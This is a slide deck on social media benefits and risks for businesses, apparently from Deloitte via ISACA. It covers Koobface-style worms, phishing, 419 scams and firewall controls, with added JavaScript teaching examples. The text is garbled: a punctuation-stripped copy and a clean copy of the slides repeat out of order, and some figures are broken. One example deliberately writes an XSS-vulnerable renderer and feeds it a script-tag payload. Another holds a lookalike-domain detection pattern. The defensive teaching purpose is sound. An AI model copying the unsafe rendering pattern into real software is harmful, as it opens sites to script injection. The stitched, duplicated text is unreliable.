Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
Slide 48: A quick word on privacy

"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
— Mark Zuckerberg, Facebook founder

"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
— Eric Schmidt, CEO, Google Inc.
Slide 49: A quick word on privacy (cont.)

• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence: limited attempt to address
Slide 50: Responding to the risks and challenges

• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Define consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
Slide 51: Responding to the risks and challenges

• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
Slide 52: Responding to the risks and challenges (cont.)

• Vulnerability Assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on Ports 80 & 443
  – Next-generation firewall technology that offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real-time
    • Visibility and policy control over application access
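Why the port-based model on this slide cannot express a social-networking policy, and what the application-aware model adds, shown as a small rule engine in JavaScript. This is an added example, not code or configuration from the presentation or from any firewall product; the flow records, application labels, user names and rule syntax are constructed. A real next-generation firewall supplies the application and user fields from content inspection and directory integration, which the example takes as given.

```javascript
// Added illustration, not from the presentation or any vendor. The same constructed
// set of flows is evaluated twice: once with port-based rules (the "historical" model
// on the slide) and once with application- and user-aware rules.

// Constructed flow records. "app" is what content inspection would label the session
// and "user" is what the directory lookup returned; a port-only rule sees neither.
// Every social-networking flow below rides on 80/443, as the slide says, except the
// last one, which uses a non-standard port to get around a port rule.
const FLOWS = [
  { user: "alice", srcIp: "10.1.1.5", dstPort: 443,  app: "webmail-internal", action: "read" },
  { user: "alice", srcIp: "10.1.1.5", dstPort: 443,  app: "facebook-browse",  action: "read" },
  { user: "bob",   srcIp: "10.1.1.9", dstPort: 443,  app: "facebook-post",    action: "upload" },
  { user: "bob",   srcIp: "10.1.1.9", dstPort: 80,   app: "facebook-apps",    action: "install" },
  { user: "carol", srcIp: "10.1.2.3", dstPort: 443,  app: "facebook-post",    action: "upload" },
  { user: "dave",  srcIp: "10.1.2.7", dstPort: 8443, app: "facebook-browse",  action: "read" },
];

// Port-based rule set: the only attributes available are port and address.
const PORT_RULES = [
  { name: "allow-web",    match: (f) => f.dstPort === 80 || f.dstPort === 443, verdict: "allow" },
  { name: "default-deny", match: () => true,                                   verdict: "deny" },
];

// Constructed group: the only users allowed to post on the corporate account.
const SOCIAL_MEDIA_TEAM = new Set(["carol"]);

// Application-aware rule set, evaluated top to bottom, first match wins.
// Browsing is allowed for everyone, posting only for the social-media team,
// third-party app installs for nobody; the port never appears in a condition.
const APP_RULES = [
  { name: "allow-webmail",  match: (f) => f.app === "webmail-internal",                        verdict: "allow" },
  { name: "allow-browse",   match: (f) => f.app === "facebook-browse",                         verdict: "allow" },
  { name: "allow-team-post",match: (f) => f.app === "facebook-post" && SOCIAL_MEDIA_TEAM.has(f.user), verdict: "allow" },
  { name: "deny-social",    match: (f) => f.app.startsWith("facebook-"),                       verdict: "deny" },
  { name: "default-deny",   match: () => true,                                                 verdict: "deny" },
];

// First-match evaluation, as a firewall rulebase works. Unmatched flows are denied.
function evaluate(rules, flow) {
  for (const rule of rules) {
    if (rule.match(flow)) return rule.verdict;
  }
  return "deny";
}

// Verdict per flow, for a policy report.
function applyPolicy(rules, flows) {
  return flows.map((f) => ({
    user: f.user, app: f.app, port: f.dstPort, verdict: evaluate(rules, f),
  }));
}

function countAllowed(rules, flows) {
  return applyPolicy(rules, flows).filter((r) => r.verdict === "allow").length;
}

console.log("port-based:", applyPolicy(PORT_RULES, FLOWS));
console.log("app-aware: ", applyPolicy(APP_RULES, FLOWS));
```

With the port rules, five of the six flows are allowed, including the app install and bob's unauthorised post, because on port 443 they are indistinguishable from the internal webmail session; the only flow they stop is dave's browsing on 8443, which is harmless. The application rules reverse both outcomes: the install and bob's post are denied, and dave's browsing is allowed regardless of port.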
Slide 53: What is next in the world of social networking
Slide 54: Where we are at today

• Enterprise Social Media has crossed the tipping point and is no longer considered an "emerging" technology
  [Figure on the slide: "The Hype Cycle", http://en.wikipedia.org/wiki/Hype_cycle]
Slide 55: What's next in the world of social networking

• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, an increase of more than 400% over the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social Networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them
Slide 56: Some further predictions

• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war." — Mark Zuckerberg, Facebook founder
  – "(Twitter is)… Something important that has the potential to change the world, though we have a long way to go." — Biz Stone, Co-founder of Twitter
Slide 57: Q&A
Slide 58: Today's Presenters

Nelson Gibbs
Senior Manager, AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
Slide 59: Appendix

• Additional resources
  – Gopal, Raj, et al., "Web 2.0 reinvents corporate networking", Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Great Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out", by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says", by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
Slide 60

This presentation contains general information only and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax, or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.

Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
Slide 21: Companies typically adopt Social Media for three major benefits

1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
Slide 22: Increase employee productivity and operational efficiencies

• Creates a lightweight institutional memory system for a company's intellectual assets to be easily captured, stored and accessed
• Reduce the net volume of e-mail and allow users to "pull" information at their convenience, as opposed to spending time reading through mass e-mail chains
• Create better quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world

Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using Social Media

Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to "about 30 seconds" per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
Slide 23: Increase employee productivity and operational efficiencies (cont.)

• American Red Cross
  – Designed to incite discussions around issues the American Red Cross cares about and describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and give valuable information about preventing, preparing for and responding to emergencies. http://redcrosschat.org
Slide 24: Increase employee productivity and operational efficiencies (cont.)

• Deloitte's DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte

As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Slide 25: Foster creativity, innovation and collaboration

• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues

Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings

Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents
Slide 26: Foster creativity, innovation and collaboration (cont.)

• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees. httpsmixblueshirtnationcom
Slide 27: Foster creativity, innovation and collaboration (cont.)

• Deloitte's DStreet
  – Enterprise talent networking site - changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team
Slide 28: Enhance customer and partner relationships

• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception
• Provide a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allow consumers who know your products and services best to become a part of the new offering development process

Revenue growth
• A major consumer goods company improved sales by 315 by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40 uptick in average order value
Slide 29: Enhance customer and partner relationships (cont.)

• Procter & Gamble
  – Capessa launched in the "Yahoo Health" section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com
Slide 30: Enhance customer and partner relationships (cont.)

• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com
Slide 31: Enhance customer and partner relationships (cont.)

• State of Louisville, Kentucky
  – Interactive audit findings on Web site. Allows the users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit
Slide 32: Enhance customer and partner relationships (cont.)

• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com
Slide 33: Enhance customer and partner relationships (cont.)

• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest update.
Slide 34: Risks and challenges
Slide 35: Risks and challenges

• Farmers and Mobsters
  – Top Facebook Applications
    • Source - http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                    Monthly Active Users
   1  FarmVille                         82,580,911
   2  Static FBML                       46,827,021
   3  Birthday Cards                    41,904,049
   4  Café World                        30,032,716
   5  Facebook for iPhone               29,438,848
   6  Texas HoldEm Poker                28,332,917
   7  Slide FunSpace                    25,630,033
   8  Happy Aquarium (BETA)             24,915,971
   9  Mafia Wars                        24,704,179
  10  Causes                            24,317,292
Slide 36: Risks and challenges (cont.)

• New security concerns and attack vectors — as a result of the shift in technology through Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients that are enhancing client-end interfaces in the browser itself
• Top 10 Web 2.0 Attack Vectors — http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting ("CSS") in AJAX, e.g. "Samy worm that exploited MySpace.com's CSS flaw"
  – XML poisoning — poison XML blocks coming from AJAX client
  – Malicious AJAX code execution — replay of cookies for each request
  – RSS/Atom injection — inject JavaScripts into the RSS feeds to generate attack on client browser
  – Web Services Definition Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines — fail to perform server-side checks
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP message — bypass authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
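Two of the vectors in the list above, cross-site scripting through AJAX-delivered data and client-side-only validation, shown in JavaScript as the vulnerable pattern next to its hardened form. This is an added example, not code from the presentation or from the net-square paper it cites; the function names, the 140-character limit and the sample JSON response are constructed for it.

```javascript
// Added illustration, not from the presentation. (1) A field from an AJAX response is
// placed into markup unencoded, so a script tag in user data runs in every viewer's
// browser (the Samy-class weakness). (2) The input check lives only in the browser,
// so a request sent without the page skips it; the server must validate again.

// Constructed AJAX response: "status" is user-supplied text that carries markup.
const SAMPLE_RESPONSE = JSON.stringify({
  user: "alice",
  status: 'hello <script>alert("xss")</script>',
});

// Vulnerable renderer: interpolates the field straight into markup, which is what a page
// does when it assigns the result to innerHTML. The tag survives intact.
function renderStatusUnsafe(responseText) {
  const data = JSON.parse(responseText);
  return `<p class="status"><b>${data.user}</b>: ${data.status}</p>`;
}

// Hardened renderer: encode the five HTML metacharacters before the text reaches markup
// (equivalently, assign to textContent instead of innerHTML).
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderStatusSafe(responseText) {
  const data = JSON.parse(responseText);
  return `<p class="status"><b>${escapeHtml(data.user)}</b>: ${escapeHtml(data.status)}</p>`;
}

// One validation routine used on BOTH sides. The browser runs it for fast feedback; the
// server runs it again because the browser copy can be bypassed entirely by posting the
// JSON body directly.
const MAX_STATUS_LENGTH = 140; // constructed limit

function validateStatus(value) {
  if (typeof value !== "string") return "status must be a string";
  if (value.length === 0 || value.length > MAX_STATUS_LENGTH) {
    return `status must be 1-${MAX_STATUS_LENGTH} characters`;
  }
  if (/[\u0000-\u001f\u007f]/.test(value)) return "status contains control characters";
  return null; // valid
}

// Server-side handler for the AJAX POST body. It trusts nothing the client claims to
// have checked and returns a result object rather than throwing.
function handleStatusUpdate(requestBody) {
  let data;
  try {
    data = JSON.parse(requestBody);
  } catch (err) {
    return { ok: false, error: "malformed JSON" };
  }
  const problem = validateStatus(data && data.status);
  if (problem !== null) return { ok: false, error: problem };
  // Store the raw text; encoding happens once, at render time, in the output context.
  return { ok: true, stored: data.status };
}

console.log("unsafe:", renderStatusUnsafe(SAMPLE_RESPONSE));
console.log("safe:  ", renderStatusSafe(SAMPLE_RESPONSE));
console.log(handleStatusUpdate(JSON.stringify({ status: "x".repeat(5000) })));
```

The design point is where the encoding happens: the server keeps the text as typed and the renderer encodes for the context it writes into, so the same stored value can later go into JSON, a feed or an e-mail with the encoding appropriate to each, rather than being "cleaned" once on input with rules that fit none of them.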
Slide 37: Risks and challenges (cont.)

• Example worms / phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data
  – Fbaction - Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account
Slide 38: Risks and challenges (cont.)

  – Boface - convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
• Common element – they all take advantage of the implied trust that social networking users have with each other
Slide 39: Risks and challenges (cont.)

"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." - Marcus Ranum, in InfoSec Magazine, May 2008

• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools
• May also take advantage of URL Shortening – bit.ly, tr.im, tinyurl.com, etc.
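A link-triage routine for the worm and phishing lures described on the preceding slides, added here as an example rather than taken from the presentation. It flags links through the shorteners just named, whose destination is hidden from the reader, and hosts that use a brand keyword without belonging to that brand's own domain, which is the shape of the fbaction.net lure. The brand list, the allowed domains, the sample messages and the function names are all constructed assumptions.

```javascript
// Added illustration, not from the presentation: defender-side triage of the links in
// social-media messages. Findings are input for a human reviewer or a URL sandbox,
// not a block/allow verdict on their own.

const SHORTENER_DOMAINS = ["bit.ly", "tr.im", "tinyurl.com"]; // the three named on the slide

// Brand keywords and the domains that may legitimately carry them (constructed, minimal).
const BRANDS = [
  { name: "Facebook", keywords: ["facebook", "fb"], domains: ["facebook.com", "fb.com"] },
  { name: "Twitter",  keywords: ["twitter"],        domains: ["twitter.com"] },
  { name: "MySpace",  keywords: ["myspace"],        domains: ["myspace.com"] },
];

const URL_PATTERN = /\bhttps?:\/\/[^\s<>"']+/gi;

// True when hostname is the domain itself or a subdomain of it.
function isOrUnder(hostname, domain) {
  return hostname === domain || hostname.endsWith("." + domain);
}

// Classify one URL. Returns a list of findings; an empty list means nothing was flagged.
function assessLink(rawUrl) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch (err) {
    return ["unparseable URL"];
  }
  const host = url.hostname.toLowerCase();
  const labels = host.split(".");
  const findings = [];

  if (SHORTENER_DOMAINS.some((d) => isOrUnder(host, d))) {
    findings.push("shortened link: destination hidden");
  }

  for (const brand of BRANDS) {
    // A brand keyword inside any hostname label (e.g. "fbaction", "facebook-login",
    // "facebook.com.evil.example") while the host is not under one of the brand's real
    // domains. This deliberately over-flags; the cost of a false positive here is a
    // second look, not a blocked user.
    const mentionsBrand = labels.some((l) => brand.keywords.some((k) => l.includes(k)));
    const isGenuine = brand.domains.some((d) => isOrUnder(host, d));
    if (mentionsBrand && !isGenuine) {
      findings.push(`lookalike: "${host}" uses the ${brand.name} name but is not a ${brand.name} domain`);
    }
  }
  return findings;
}

// Run the check over every link in a message.
function triageMessage(text) {
  const links = text.match(URL_PATTERN) || [];
  return links.map((link) => ({ link, findings: assessLink(link) }));
}

// Constructed sample messages of the kind that appear on a compromised account's wall.
const SAMPLE_MESSAGES = [
  "new album is up http://www.facebook.com/album.php?id=123",
  "OMG is this really you?? http://bit.ly/2xYz9",
  "Facebook needs you to re-confirm your account: http://fbaction.net/login?u=alice",
];

for (const message of SAMPLE_MESSAGES) {
  console.log(JSON.stringify(triageMessage(message)));
}
```

The first message produces no findings, the second is flagged only as shortened, and the third is flagged as a lookalike. Resolving a shortened link to its final destination, and then re-running the lookalike check on that destination, is the natural next step but needs network access, so it is left out here.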
Slide 40: Risks and challenges (cont.)

• More on phishing — social networks are a target-rich environment
Slide 41: Risks and challenges (cont.)

• More on phishing — social networks are a target-rich environment (cont.)

"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year……" - See http://www.419legal.org for more details

• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
Slide 42: Risks and challenges (cont.)

• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation — Third-party material such as essays, articles and photographs are used without written consent from the proprietor
• Intellectual Property theft — Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium
Slide 43: Risks and challenges (cont.)

• Failures in the use of Social Media — most companies that use Social Media don't approach it the way they would with other mission-critical technology
  – At best it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
"Fully half of all Social Media investments will fail." — Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
